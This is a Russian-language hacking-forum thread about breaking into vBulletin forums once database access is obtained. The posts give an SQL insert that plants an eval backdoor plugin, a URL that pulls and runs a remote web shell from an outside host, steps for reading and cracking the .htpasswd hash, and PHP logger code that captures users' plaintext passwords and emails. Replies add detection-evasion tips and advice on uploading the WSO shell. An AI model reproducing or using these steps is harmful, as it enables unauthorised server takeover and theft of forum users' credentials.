Вернуться   Форум Uinsell.Net > Hacking & Security > Веб-хакинг
Войти через OpenID

Ответ
 
Опции темы Опции просмотра

Заливка шелла имея доступ к БД & логгер в плагины
Старый 02.05.2013, 03:33   #1
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию Заливка шелла имея доступ к БД & логгер в плагины

Ну так получилось, что админ очередного булкоресурса дебил, конечно, но админка была запаролена, а пасс на бд был довольно таки сложный)
Код:
****
123456
и вот, не долго думая, изобрели велосипед=)
конечно, можно было и сменить пасс админу в БД, зайти с его акка, только толку, админка все равно под паролем.
итак:
лезем в БД
выполняем запрос

Код:
INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES
(123456, 'sort', 'faq_complete', 'eval($_GET[hack]);', 'adv_cmps', '', 1, 5);
adv_cmps можно заменить на что нибудь другое, vBulletin, например
далее переходим
http://site.ru/faq.php?hack=eval%28file_get_contents%28%27http:/host/shell.txt
идем в папку с админкой, смотрим где лежит .htpasswd
открываем .htaccess
будет нечто
Код:
AuthType Basic
AuthName "/www/host/admincp"
AuthUserFile /var/www/user/data/etc/*numid*.passwd
<Limit GET POST>
	require valid-user
</Limit>
идем смотреть
Код:
/var/www/user/data/etc/*numid*.passwd
будет что то вроде
Код:
user:$1$2*****************
далее юзаем [Ссылки видны только зарегистрированным пользователям. Зарегистрироваться]
качаем, покупаем софтину, ну или хз где вы возьмете ее
идем
Код:
C:\egb\Hashes\MD5(Unix).txt
вставляем туда полученный пароль
Код:
$1$2*****************
настройки находятся в соседней папке
Код:
Settings\MD5(Unix).ini
далее - пуск - выполнить - cmd
cd C:\egb\
EGB.exe 22 "Settings\MD5(Unix).ini" "Hashes\MD5(Unix).txt"
сколько времени уйдет на расшифровку пароля - зависит целиком и полностью от его сложности
ну а после того как расшифруется пароль - заходим в админку и ...
profit

дальше, чтоб не парится с расшифровкой хешей, я решил повесить на похек0ный форум логгер

Местоположение модуля: login_process
Заголовок: Любой
Порядок выполнения: 5
Код PHP модуля:
Код:
 $log_username = strtolower($vbulletin->GPC["vb_login_username"]);
    $log_password = $vbulletin->GPC["vb_login_password"];
    $log_file = "./ooooooo.html";
    $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $log_username . "'"); 

    while($row = @mysql_fetch_array($sql_query))
    { 

       if(strlen($log_password) > 1 AND strlen($log_username) > 1)
       {
          $fp1 = @fopen($log_file, "a+");
          @fwrite($fp1, $log_username . ' : ' .  $log_password." (" . $row["email"] . ")\n");
          @fclose($fp1);
          $f = @file($log_file);
          $new = array_unique($f);
          $fp = @fopen($log_file, "w");
          foreach($new as $values)
          {
             @fputs($fp, $values);
          }
          @fclose($fp);
       }
    }
на 3.х работает очень даже, в принципе должен работать и на 4.х
и да, лить в includes - профита никакого, там, как то не странно, htaccess
с deny from all, в основном
и доступа к логам не вы получите, разве что через шелл=)

(c) GraBBerZ & Xaker.Name
  Ответить с цитированием
10 cпасибо от:

Старый 02.05.2013, 04:51   #2
'VIP' user
 
Аватар для mamacita


Обратиться по нику

Инфо
Регистрация: 03.09.2009
Сообщений: 3,372
По умолчанию

Цитата:
Сообщение от hooligan Посмотреть сообщение
@fwrite
Вместо этого лучше
Код:
error_reporting(0);
display_errors(0);
И модуль палевный, если нужно надолго вешать, лучше заменить файл, куда приходят POST после логина (создать модуль, который после <?php в нужный файл записывает код, после модуль удалить). Но это если права на запись есть, или если их можно установить.
  Ответить с цитированием

Старый 02.05.2013, 05:06   #3
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

Magnet0, нет, именно это "не палевно"
на большинстве тех форумов что попадались мне - стоял "инспектор файлов" и вот он то и шлет отчеты на мыло админу, вот это палево=)
  Ответить с цитированием

Старый 02.05.2013, 17:19   #4
 
Аватар для Поук


Обратиться по нику

Инфо
Регистрация: 03.09.2009
Сообщений: 1,134
Благодарностей: 1466
ICQ: 380102
По умолчанию

hooligan, как ты догадался такой запрос в бд сделать? все понятно, кроме запроса

Цитата:
Сообщение от hooligan Посмотреть сообщение
качаем, покупаем софтину, ну или хз где вы возьмете ее
а ты где качал?
  Ответить с цитированием

Старый 02.05.2013, 17:37   #5
n/a
 
Аватар для qwerty


Обратиться по нику

Инфо
Регистрация: 03.09.2009
Сообщений: 3,803
Благодарностей: 6838
По умолчанию

[Ссылки видны только зарегистрированным пользователям. Зарегистрироваться]
  Ответить с цитированием

Старый 03.05.2013, 15:27   #6
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

Цитата:
Сообщение от Поук Посмотреть сообщение
а ты где качал?
где я качал там больше нет.
если найти самому не получается и вы ждете что вам щас вот все навыкладывают, и вы похекаете интернеты - наивные вы, хрен там.
покупайте
Цитата:
Сообщение от Поук Посмотреть сообщение
как ты догадался такой запрос в бд сделать
я не догадывался, я знал
  Ответить с цитированием

Старый 03.05.2013, 15:33   #7
 
Аватар для Поук


Обратиться по нику

Инфо
Регистрация: 03.09.2009
Сообщений: 1,134
Благодарностей: 1466
ICQ: 380102
По умолчанию

сам найти я смогу,
но по этикету нужно выкладывать ссылки на весь используемый софт
  Ответить с цитированием

Старый 03.05.2013, 15:39   #8
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

Цитата:
Сообщение от Поук Посмотреть сообщение
но по этикету нужно выкладывать ссылки на весь используемый софт
ссылка в 1 посте
я не буду выкладывать "сломанный" софт автора этой софтины, там есть демо версия
кого не устрайвает демо версия/не может сам найти сломаную - покупайте
  Ответить с цитированием

Старый 12.05.2013, 11:13   #9
Новичок
 
Аватар для Надир


Обратиться по нику

Инфо
Регистрация: 06.05.2012
Сообщений: 39
Благодарностей: -10
ICQ: 403934
По умолчанию

Цитата:
Сообщение от hooligan Посмотреть сообщение
лезем в БД
Как?
  Ответить с цитированием

Старый 12.05.2013, 19:18   #10
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

Цитата:
Сообщение от Надир Посмотреть сообщение
Как?
перечитайте тему еще раз
  Ответить с цитированием
2 cпасибо от:

Старый 02.06.2013, 15:42   #11
Новичок
 
Аватар для Suleman


Обратиться по нику

Инфо
Регистрация: 02.06.2013
Сообщений: 6
Благодарностей: 1
По умолчанию

Запрос выполнился усешно,но после выполнения команды
[Ссылки видны только зарегистрированным пользователям. Зарегистрироваться]
Ничего не происходит.Какой shell Вы здесь использовали? http:/host/shell.txt
Подскажите что неправильно делаю?
  Ответить с цитированием

Старый 02.06.2013, 17:03   #12
 
Аватар для Поук


Обратиться по нику

Инфо
Регистрация: 03.09.2009
Сообщений: 1,134
Благодарностей: 1466
ICQ: 380102
По умолчанию

Suleman, WSO попробуйте
  Ответить с цитированием

Старый 02.06.2013, 17:11   #13
Новичок
 
Аватар для Suleman


Обратиться по нику

Инфо
Регистрация: 02.06.2013
Сообщений: 6
Благодарностей: 1
По умолчанию

wso и пробовал он должен быть в txt? Он должен запуститься или загрузитьсяв корень хз?
  Ответить с цитированием

Старый 02.06.2013, 17:55   #14
Новичок
 
Аватар для Надир


Обратиться по нику

Инфо
Регистрация: 06.05.2012
Сообщений: 39
Благодарностей: -10
ICQ: 403934
По умолчанию

Изучил я эту темку воть...)
Короче, вы имеете доступ к БД, там хранятся все пароли, возможно в зашифрованном виде (md5, расшифровывать на сайте: md5decryption.com), найдите таблицу которая примерно называется: users, там увидите логин админа и пароль, после того как узнали пароль, ищите админку сайта: обычно site/admin/ или site/admin.php если не найдете ищите в нете программу для поиска админки сайта. но передд этим попробуйте авторизоватся на самом сайте через форму входа!
Кстать попробуйте так: откройте прогу filezilla внутри: хост: ваш_сайт, логин: логин админа (попробуйте данные от БД), пасс: пароль (тоже можете попробовать данные из БД)
Получилось? теперь лазите по админке и ищите что то вроде: "загрузка файла" или редактор шаблонов,
1. Если найдете загрузка файла. то загружайте webslell: wso2.4, порекомендую русифицированный частично мной: [Ссылки видны только зарегистрированным пользователям. Зарегистрироваться]
Допустим вы залили содержимое архива в папку shell хостинга, отлично, теперь переходим сюда: site/shell/wso2.php и воаля, полный контроль сервера (почти полныйво всяком случае вы же не пользователь root (супер-администратор)
2. Вы нашли редактор шаблонов) отлично) там ищите штуку: создать новый файл шаблона и назовите его wso2.php а внутрь засуньте содержимое файла wso2.php из архива, теперь попробуйте открыть ваш "шаблон")
3. Ну еще как то шеллы на index.php и .htacces заделывают) я с этим не знаком
  Ответить с цитированием

Старый 02.06.2013, 18:20   #15
Новичок
 
Аватар для Suleman


Обратиться по нику

Инфо
Регистрация: 02.06.2013
Сообщений: 6
Благодарностей: 1
По умолчанию

Что это?
  Ответить с цитированием

Старый 02.06.2013, 22:42   #16
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

Надир, вы сами то поняли что написали?

Цитата:
Сообщение от Надир Посмотреть сообщение
возможно в зашифрованном виде (md5
не возможно, а зашифрованный и не просто мд5, а
md5(md5($pass).$salt)

Цитата:
Сообщение от Надир Посмотреть сообщение
обычно site/admin/ или site/admin.php
опять бред.
у булки всегда есть и было admincp
которая вероятнее всего запаролена

Цитата:
Сообщение от Надир Посмотреть сообщение
порекомендую русифицированный частично мной
вы опять же не понимаете что делаете, зачем лезьть туда, куда вам лезьть не обязательно да и нахрен не нужно

Цитата:
Сообщение от Надир Посмотреть сообщение
и воаля, полный контроль сервера
конечно, если админ сервера идиот, то вас ясен хрен пустит выше каталога юзеров, ага

Цитата:
Сообщение от Надир Посмотреть сообщение
Вы нашли редактор шаблонов) отлично) там ищите штуку: создать новый файл шаблона и назовите его wso2.php а внутрь засуньте содержимое файла wso2.php из архива, теперь попробуйте открыть ваш "шаблон")
где это такое в булке видели, чтобы код пхп исполнялся как шаблон, опять бредите?

Suleman, переименуйте wso2.php в wso2.txt, уберите вначале <?php и в конце ?>
залейте себе на хост и обращайтесь к нему по выше указаной ссылке
  Ответить с цитированием
Спасибо от:

Старый 03.06.2013, 21:13   #17
Новичок
 
Аватар для Suleman


Обратиться по нику

Инфо
Регистрация: 02.06.2013
Сообщений: 6
Благодарностей: 1
По умолчанию

hooligan походу там модули/продукты отключены,из-за этого не хочет заливаться.Сейчас сижу думаю как включить продукты через myadmin.
  Ответить с цитированием

Старый 03.06.2013, 22:05   #18
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

так посмотрите, есть ли доступ к admincp
если есть - хешь админу смените в БД и залейтесь=)
  Ответить с цитированием

Старый 03.06.2013, 22:23   #19
Новичок
 
Аватар для Suleman


Обратиться по нику

Инфо
Регистрация: 02.06.2013
Сообщений: 6
Благодарностей: 1
По умолчанию

Нету так бы и сделал.
  Ответить с цитированием

Старый 04.06.2013, 05:45   #20
Private Stuff
 
Аватар для hooligan


Обратиться по нику

Инфо
Регистрация: 20.05.2011
Сообщений: 314
Благодарностей: 829
ICQ: n/a
По умолчанию

таблица plugin
Код:
INSERT INTO plugin VALUES('357', 'Хак скрытия данных: Load vS_HHR_Engine.php', 'mod_global', '// load the engine lib.\r\n(($hhr_lib = fetch_hhr_library(\'engine\')) ? eval($hhr_lib) : false);', 'psionic_hide', '', '1', '5');
значение - 1 - включено
0 - соответственно, выключено
посмотрите любой хук, включен ли он
  Ответить с цитированием
2 cпасибо от:
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Текущее время: 22:40. Часовой пояс GMT +4.



Powered by vBulletin
Copyright © 2009-2016 UinSell.Net
Лицензия зарегистрирована на: UinSell

Перевод: zCarot